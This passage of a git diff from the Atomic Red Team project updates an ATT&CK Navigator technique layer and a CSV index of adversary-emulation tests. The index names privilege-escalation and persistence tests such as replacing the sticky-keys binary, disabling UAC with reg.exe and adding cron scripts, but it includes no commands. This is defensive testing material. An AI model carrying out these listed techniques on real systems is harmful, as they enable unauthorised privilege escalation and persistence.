,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index b0c89087..dbe30ffd 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -2,6 +2,7 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell @@ -16,12 +17,14 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt @@ -63,6 +66,7 @@ privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh @@ -86,6 +90,7 @@ privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon P persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt @@ -107,13 +112,15 @@ persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to cron 